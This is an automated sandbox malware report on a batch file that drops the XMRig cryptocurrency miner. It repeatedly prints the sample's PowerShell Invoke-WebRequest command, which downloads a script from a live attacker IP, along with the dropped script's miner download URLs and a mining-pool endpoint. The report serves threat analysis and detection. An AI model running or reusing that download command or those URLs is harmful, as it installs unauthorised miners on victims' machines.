Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ceR3axDjok.bat

Overview

General Information

Sample name:ceR3axDjok.bat
renamed because original name is a hash value
Original sample name:8524f6f843902e2d19f29a578f76adf6.bat
Analysis ID:1587642
MD5:8524f6f843902e2d19f29a578f76adf6
SHA1:23e89e62096675945ab5363a0d4a940573f2aa77
SHA256:98415c21b45b1008b74b44cae8f3c27e803d2bb4a3899c79fb079c3cc833ac36
Tags:batuser-abuse_ch
Infos:

Detection

Xmrig
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Found strings related to Crypto-Mining
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • cmd.exe (PID: 6628 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6044 cmdline: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\script.phpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", ProcessId: 6044, ProcessName: powershell.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", ProcessId: 6044, ProcessName: powershell.exe
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", ProcessId: 6044, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", ProcessId: 6044, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T16:15:33.220488+010018100002Potentially Bad Traffic192.168.2.44973245.138.16.19380TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://45.138.16.193/xmrigAvira URL Cloud: Label: malware
      Source: http://45.138.16.193/php-exe.phpAvira URL Cloud: Label: malware
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.5% probability

      Bitcoin Miner

      barindex
      Source: Yara matchFile source: dump.pcap, type: PCAP
      Source: Yara matchFile source: C:\Users\user\Desktop\script.php, type: DROPPED
      Source: script.php.2.drString found in binary or memory: $httpUrlLinux = 'http://45.138.16.193/xmrig'; // URL per xmrig (Linux)
      Source: Joe Sandbox ViewASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL
      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 45.138.16.193:80
      Source: global trafficHTTP traffic detected: GET /php-exe.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.138.16.193Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.16.193
      Source: global trafficHTTP traffic detected: GET /php-exe.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.138.16.193Connection: Keep-Alive
      Source: ceR3axDjok.batString found in binary or memory: http://45.138.16.193/php-exe.php
      Source: script.php.2.drString found in binary or memory: http://45.138.16.193/xmrig
      Source: script.php.2.drString found in binary or memory: http://45.138.16.193/xmrig.exe
      Source: script.php.2.drString found in binary or memory: https://api.moneroocean.stream/miner/$moneroOceanWallet/stats
      Source: classification engineClassification label: mal68.mine.winBAT@4/4@0/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\script.phpJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6652:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fuloniuf.ebl.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"Jump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4028Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4085Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260Thread sleep count: 4028 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260Thread sleep count: 4085 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5628Thread sleep time: -8301034833169293s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2188Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid Accounts1
      PowerShell
      1
